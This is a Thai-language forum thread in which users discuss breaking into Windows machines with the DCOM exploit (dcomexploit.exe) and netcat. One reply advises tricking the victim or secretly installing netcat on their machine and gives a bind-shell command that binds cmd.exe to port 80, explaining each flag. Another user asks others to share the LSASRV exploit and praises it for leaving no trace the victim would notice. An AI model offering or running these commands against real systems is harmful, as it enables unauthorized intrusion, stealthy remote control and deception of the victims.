ผมลองใช้ dcomexploit.exe ในเครื่องที่มีช่องโหว่แต่พอมันบอกให้ ใช้ netcat connect ที่ port 4444 ของเครื่องเป้าหมายพอ ใช้คำสั่งคือ nc xxx.xxx.xxx.xxx 4444 แล้วมันไม่ให้ cmd เครื่องเป้าหมายมา ต้องทำยังไงครับ
Printable View
ผมลองใช้ dcomexploit.exe ในเครื่องที่มีช่องโหว่แต่พอมันบอกให้ ใช้ netcat connect ที่ port 4444 ของเครื่องเป้าหมายพอ ใช้คำสั่งคือ nc xxx.xxx.xxx.xxx 4444 แล้วมันไม่ให้ cmd เครื่องเป้าหมายมา ต้องทำยังไงครับ
XP Sp1 Sp2 ก็ใช้ไม่ได้แล้วครับ ทาง microsoft ได้อุดช่องโหว่แล้ว
งั้นเราก็เปลี่ยนครับ
ให้เหยื่อเปิดพอร์ตเลยครับ แล้วให้มันโยน CMD กลับมาแทน
โดยให้ที่เครื่องเหยื่อ ใช้ netcat แบบนี้ครับ (หาวิธีหลอกล่อหรือติดตั้งเอาเอง)
nc.exe -L -p 80 -d -e cmd.exe
-L คือให้ listen ที่พอร์ต -p 80 ตลอดเวลา (แอลตัวใหญ่)
ส่วน -d -e cmd.exe คือให้ redirect application ไปที่ cmd ครับผม
ลองไปใช้ดูนะครับ
งั้นเราก็เปลี่ยนครับ
ให้เหยื่อเปิดพอร์ตเลยครับ แล้วให้มันโยน CMD กลับมาแทน
ผมว่าถ้าเราใช้ nc เปิด port อะไรซักอันอันทิ้งไว้รอการ connect จากเราแล้วเรา connect เข้าไปทาง port ที่เราเปิดไว้อะคับน่าจะได้ เคยทำบนลีนุก แต่วินโดว์ไม่เคย ว่าแต่ผมเข้าใจอะไรผิดป่าวเนี่ย
จริงๆก็มีโปรแกรมอีกตัวที่ชื่อ LSASRV_04011 ตัวนั้นก็ไว้เปิดช่องโหว่ของ lsasrv.dll แล้วค่อยให้มันรับportที่เราระบุไว้ แต่ตอนนี้ผมหาไม่ได้แระ ใครมีก็รบกวนลงให้ด้วยนะครับ^^
P$. ตัวนี้มันจาไม่เหมือนdcomก้คือ ถ้าเราใช้dcomเนี่ย เจ้าตัวจะรู้แน่ๆว่าโดนเจาะ เพราะคอมมันจาทำการรีเครื่องแบบบังคับอ้ะ แต่ถ้าใช้lsasrvมันจาเงียบๆไปเลย ไม่มีสิ่งผิดปกติอ่า^^